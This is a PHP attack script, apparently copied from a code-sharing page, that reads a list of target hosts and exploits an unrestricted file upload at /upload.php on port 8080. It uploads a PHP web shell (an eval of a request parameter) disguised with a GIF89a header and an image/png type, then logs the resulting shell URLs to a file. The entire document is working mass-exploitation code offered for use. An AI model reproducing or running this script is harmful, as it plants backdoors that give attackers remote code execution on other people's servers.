1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95
|
<?php
if(count($argv)<3){ print "\r\n\tUse Examply: ".$argv[0]." url.txt save.txt\r\n"; exit; }
function http_send($host, $packet){
$sock = fsockopen($host, 8080);
if(!$sock){ print "\n[-] No response from {$host}:8080 Trying again..."; $sock = fsockopen($host, 8080); } fwrite($sock, $packet); while (!feof($sock)) { $resp=fread($sock,1024); } fclose($sock); return $resp;
}
function data($host,$filename){
$payload .= "------WebKitFormBoundaryF1mJrJElc0yUu1HA\r\n"; $payload .= "Content-Disposition: form-data; name=\"file\"; filename=\"{$filename}\"\r\n"; $payload .= "Content-Type: image/png\r\n\r\n"; $payload .= 'GIF89a'."\r\n".'<?php eval($_REQUEST[shell])?>'."\r\n\r\n"; $payload .= "------WebKitFormBoundaryF1mJrJElc0yUu1HA--\r\n"; $packet = "POST /upload.php HTTP/1.1\r\n"; $packet .= "Host: {$host}:8080\r\n"; $packet .= "Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryF1mJrJElc0yUu1HA\r\n"; $packet .= "Content-Length: ".strlen($payload)."\r\n"; $packet .= "Connection: close\r\n\r\n"; $packet .= $payload;
return $packet; }
function exploit($host){ $filename = "b.php"; $hosts = "{$host}"; $packet=data($hosts,$filename); $html=http_send($hosts,$packet); preg_match_all('/msg\":\"(.*?)\"/',$html,$match); return $match[0]; }
function w($fileName,$data){ fwrite(fopen($fileName,"a+"),$data."\r\n"); }
$url_txt = $argv[1];
$myurl = file($url_txt);
$save_file = $argv[2];
foreach ($myurl as $value) { $v=substr($value,strpos($value,"//")+2); $v=trim(str_replace("/", "", $v)); $html=exploit($v); $result = "http://{$v}:8080/".trim(str_replace("\"","",substr($html[0],strpos($html[0],":")+2))); echo "\r\n".$result; w($save_file,$result); sleep(1); }
print "\r\n\r\n[+]-----------------------------WIN--------------------\r\n\r\n"; print "Save complete in {$save_file}\r\n\r\n";
?>
|
评论